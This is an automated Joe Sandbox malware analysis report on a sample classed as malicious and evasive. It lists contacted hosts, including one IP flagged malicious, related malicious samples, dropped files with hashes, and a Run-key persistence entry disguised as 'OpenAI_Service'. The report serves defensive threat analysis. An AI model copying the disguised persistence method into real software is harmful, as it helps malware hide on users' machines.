                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9kexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://ns.adobe.cexplorer.exe, 0000000F.00000003.2065246181.0000000004B64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://ns.adobeexplorer.exe, 0000000C.00000002.2046865328.0000000004405000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://upx.sf.netAmcache.hve.11.drfalse
                                                                            high
                                                                            http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0snrGkqbCyKP.exefalse
                                                                              high
                                                                              https://powerpoint.office.comexplorer.exe, 0000000F.00000003.2123238140.000000000910A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2124445214.00000000090FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://ns.adexplorer.exe, 0000000F.00000003.2065246181.0000000004B64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://ns.adobeSexplorer.exe, 0000000C.00000000.2019785320.0000000004405000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://outlook.comexplorer.exe, 0000000C.00000002.2053283744.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2025979008.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126404678.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123908196.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.000000000906A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.huya.com0nrGkqbCyKP.exefalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-darkexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
IP | Domain | Country | ASN | ASN Name | Malicious
3.5.237.170 | unknown | United States | 16509 | AMAZON-02US | false
3.5.239.146 | s3-r-w.ap-east-1.amazonaws.com | United States | 16509 | AMAZON-02US | false
27.50.63.8 | unknown | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | true
52.95.162.66 | unknown | United States | 16509 | AMAZON-02US | false
52.95.160.78 | unknown | United States | 16509 | AMAZON-02US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1577407
Start date and time: 2024-12-18 13:04:52 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: nrGkqbCyKP.exe (renamed because original name is a hash value)
Original Sample Name: d7d253630a5c513c915b0c27650a3bbcd4b1918124f85185f3a330cb34aee89d.exe
Detection: MAL
Classification: mal100.evad.winEXE@13/25@6/5
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 70%
                                                                                                              • Number of executed functions: 42
                                                                                                              • Number of non-executed functions: 333
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe
                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, UserOOBEBroker.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, audiodg.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, svchost.exe, StartMenuExperienceHost.exe, TextInputHost.exe, mobsync.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 204.79.197.203, 23.218.208.109, 20.12.23.50, 20.190.177.20, 2.16.158.75, 2.16.158.176, 13.107.246.63
                                                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, r.bing.com, a-0003.a-msedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, api-msn-com.a-0003.a-msedge.net
• Not all processes were analyzed, report is missing behavior information
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                              • Report size getting too big, too many NtOpenKey calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • VT rate limit hit for: nrGkqbCyKP.exe
Time | Type | Description
07:05:57 | API Interceptor | 9149x Sleep call for process: nrGkqbCyKP.exe modified
07:06:50 | API Interceptor | 518x Sleep call for process: explorer.exe modified
07:07:21 | API Interceptor | 101979x Sleep call for process: hh.exe modified
13:06:51 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OpenAI_Service C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
13:07:00 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OpenAI_Service C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
                                                                                                                                  • 3.164.182.125
                                                                                                                                  BCPL-SGBGPNETGlobalASNSG9Kdid5k13f.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 27.50.63.8
                                                                                                                                  9Kdid5k13f.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 27.50.63.8
                                                                                                                                  3zhEXB7iUp.dllGet hashmaliciousUnknownBrowse
                                                                                                                                  • 118.107.29.172
                                                                                                                                  SGVKcFqU08.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 118.107.29.172
                                                                                                                                  i4VmSW2D4u.dllGet hashmaliciousUnknownBrowse
                                                                                                                                  • 118.107.29.172
                                                                                                                                  3zhEXB7iUp.dllGet hashmaliciousUnknownBrowse
                                                                                                                                  • 118.107.29.172
                                                                                                                                  i4VmSW2D4u.dllGet hashmaliciousUnknownBrowse
                                                                                                                                  • 118.107.29.172
                                                                                                                                  drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 27.50.63.8
                                                                                                                                  drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 27.50.63.8
                                                                                                                                  z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 202.95.11.110
                                                                                                                                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0esxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  Lu4421.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  Lu4421.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32Get hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  Memo - Impairment Test 2023 MEX010B (5).jsGet hashmaliciousUnknownBrowse
                                                                                                                                  • 3.5.239.146
                                                                                                                                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                  C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\MSVCP140.dllsxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        GameBoxMini.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            RQoBY766F5.exeGet hashmaliciousBabukBrowse
                                                                                                                                              RQoBY766F5.exeGet hashmaliciousBabukBrowse
                                                                                                                                                https://www.evergabe-online.de/installer/oba-light/oba-light_windows-x64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    1Gqt1JqOZN.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\VCRUNTIME140.dllsxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            GameBoxMini.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              drivers.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                net.zipGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                  SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                        SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                          Entropy (8bit):0.8459045172037963
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:peiOA0794addjMo+jfizuiFKZ24lO8Hj:giOb794addjMo+jqzuiFKY4lO8Hj
                                                                                                                                                                          MD5:5EB293D3D9BA916EC5B093BC8218D0E0
                                                                                                                                                                          SHA1:A67C45BC6E18BE31B0A003C2E0E7094FAF9A5B49
                                                                                                                                                                          SHA-256:2A19FFA46124F7654A9F20ECBBA81648C186718277BA8032A5E7B4819C1D97D2
                                                                                                                                                                          SHA-512:DC12C0A02B45D51EFD059A2A72F5F4F19703B1A1B6E5619EAA93CB622C756CA74B21779BD1776785B24C987812A57E0422FE7A6EB1DADC51CE78E6CA23500568
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                          Entropy (8bit):0.8112878344791874
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:PZyMOA0MZzepzddjMo+jfIzuiFKZ24lO8Hj:P4MObMte9ddjMo+jQzuiFKY4lO8Hj
                                                                                                                                                                          MD5:89298C6905E1960D3779A246FDCDACCE
                                                                                                                                                                          SHA1:2CE2AE91809CEFE95C38AF184035CD0E99ACD521
                                                                                                                                                                          SHA-256:4ACAED0C4B5F0251B6F3A1D6DF131261188A26B0D54EB50E5172E7F6E06A6CB7
                                                                                                                                                                          SHA-512:8FFF964BF0B494F09FE2FB74A71AB10E13613670FEE8721E3B3BBEFB090443E0FF73EF74D1796EA4FEF51F3E75F1F0B7CF29F5279A59B6463647D88FE3FE173B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 12:06:46 2024, 0x1205a4 type
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):58360
                                                                                                                                                                          Entropy (8bit):1.7216613218383623
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:598cJ3OG+OOxpOxx0eHTQ0pNHi7P6mBAulf1+vMJ0HG5554Y4kRCUeV62WInvIuS:0e+g0mNHOy61lQUJIYvZ7Dy4
                                                                                                                                                                          MD5:A71B2A33211F2B0A860181581F68E3B3
                                                                                                                                                                          SHA1:90BD200AE9550CB1D83E5C013FD0F35F4ED63A2C
                                                                                                                                                                          SHA-256:6D3B6B5C2FF5C1BC3F11E0F8C22176397873B638C58140B753C167074AEBCF89
                                                                                                                                                                          SHA-512:FCA5FD65161277846CD821712B4794DB1E9912A73203F8512C063086EA8B2C9E2849E8F39657E3658616F6A9DEF91AB3AAAEC5586D68511DB82CB2047C2EE78F
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):8490
                                                                                                                                                                          Entropy (8bit):3.694071039694842
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:R6l7wVeJ5WJh6Y9nOgmfteslapB889bjhqfwynBm:R6lXJIv6YNOgmfteXj8fp8
                                                                                                                                                                          MD5:C45F7204564C5AA79AD3F33792204DFC
                                                                                                                                                                          SHA1:E77A7A5094C3F781D4CB13428E1362B1696AD4D5
                                                                                                                                                                          SHA-256:1487FC4372EA210AF7C14F5F498F9BA246B441EE7F382B173D923F53702A8F22
                                                                                                                                                                          SHA-512:1C059117BBD2262585034F1A10678B528FD45BBF2F14755239FCEDCF6A4EF8AFB59D0ABC97B4E8BAF2745E7593C9E636A5DDEDE1CCA3CA0CE6AB8F51BDCAFC43
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.6.4.<./.P.i.
                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4613
                                                                                                                                                                          Entropy (8bit):4.424559994705384
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:cvIwWl8zsEtJg771I92kEWpW8VY1Ym8M4JB0KtFjyq85zVK0ylXyed:uIjfEHI7Xkd7VZJ2QQuVyed
                                                                                                                                                                          MD5:1B7DBE11FB68F6F5F375DC6CD7DCC4BF
                                                                                                                                                                          SHA1:05CF62A006580C53CD03FFD23F7B062B8818D5EB
                                                                                                                                                                          SHA-256:8AABFA0356602FA70B49D1990CD2A214FAEB1A43EC9E5427A24831134CF30D62
                                                                                                                                                                          SHA-512:A07A46322F295022C3A6E4B02F403486CF2B9533725DD99ECDF8EF28EF9CFAEFA77EDF03A8AC7427E67C303C390ED650E03D3575554BF2C962328C841B1E3F14
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636669" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 12:06:50 2024, 0x1205a4 type
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):35456
                                                                                                                                                                          Entropy (8bit):2.32861195194536
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:5h8eJJm3vf/GepoNNoIdLOTKxYXA9yXi7P65uhE56+vMFisYTBsPa7x7OcP4mWIN:4eTEQdLXPyXOyggvUFiXjyrQ3HAH6
                                                                                                                                                                          MD5:75303E3040451C0E8D6158CAA5967BD7
                                                                                                                                                                          SHA1:BA5F6FF3E7384739053683802B2691D5B4C2731E
                                                                                                                                                                          SHA-256:AF781F882A494558B2F3488ABD6C9F624AAD6F1D8CB7F6D7716ECC1E979C432F
                                                                                                                                                                          SHA-512:0EE88B7810AF6C05B21CA77C72439CCECC1EDBE6344498D958F1537E2EA6A8F1BF24F29019FA2D59CC480EE668DADB845A7C7BC58F95293915DC47AF2C54F760
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):6488
                                                                                                                                                                          Entropy (8bit):3.7170628112048307
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:RSIU6o7wVetb5U9Yte9uwBR5aMOUY89bPshDXf3R9Km:R6l7wVeJ5U9YtexpBY89bkhrfBsm
                                                                                                                                                                          MD5:90579639809DFDEC7A2F0FB6A156847C
                                                                                                                                                                          SHA1:86F316F0BCE1E73304B79335F0C32D6A3D446A9D
                                                                                                                                                                          SHA-256:1AEC1F0457E4535F061EBF03528C13BFA877416BAD23B65B40C77F31EE38B02C
                                                                                                                                                                          SHA-512:60B20CD6A9AB9ACD08BB8B8BA593F540012D85BC74EED676CEF147FD0BF49A76F3A0C0EE62E60D051CD53324573844373543BA44F137B06119E4D6BD719FD9B9
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.6.4.<./.P.i.
                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4613
                                                                                                                                                                          Entropy (8bit):4.424146778069011
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:cvIwWl8zsEtJg771I92kEWpW8VYxd25Ym8M4JB0KtFOsPyq85zVK0ylXyed:uIjfEHI7Xkd7Vyd7J2qQuVyed
                                                                                                                                                                          MD5:6AB8C2034DFC40FFB67CFBAAAB224E1A
                                                                                                                                                                          SHA1:6317C8BF556188EF896BCA42DE4A3DEFA3A63D51
                                                                                                                                                                          SHA-256:0A5CDD0102B56FCC016CECE9DE7FD2CA1F4F225C70A054E32951C210C6432BD4
                                                                                                                                                                          SHA-512:359628F472C9283EFA4952DC802321125D27E2855EA7997262CE9A386ECC2B1723BA992D45F32F48B978FE39649AB86ED21A73CC9C1B12A5ABD66382902CA4A5
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636669" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Dec 18 11:06:04 2024, mtime=Wed Dec 18 11:06:46 2024, atime=Wed Dec 18 11:06:04 2024, length=2659840, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1052
                                                                                                                                                                          Entropy (8bit):5.042112590600274
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:8m9HDNxZ4gXY/sg6BNAy46Y/sR6FcMy7Myzqygm:8m9H5xZ4gWd95l/B+Mpyg
                                                                                                                                                                          MD5:521DB7C6D2CEB98A32E96F93CBDCD214
                                                                                                                                                                          SHA1:E90D45BA44500B394BBD5E7991497574CA257303
                                                                                                                                                                          SHA-256:C72576F60553D3E16E97B1F2BB2937653A00BBD7124E27AC27E915EFDB5ABBEF
                                                                                                                                                                          SHA-512:7B5A0492718194509AAE927C09BA3F64D911DC7C91918CF3D6250829F5B296605F9FC1683A04EF5FDE8B4D11CAE2CFCAA92962B87B3BFE4E6E552100535A2301
                                                                                                                                                                          Malicious:false
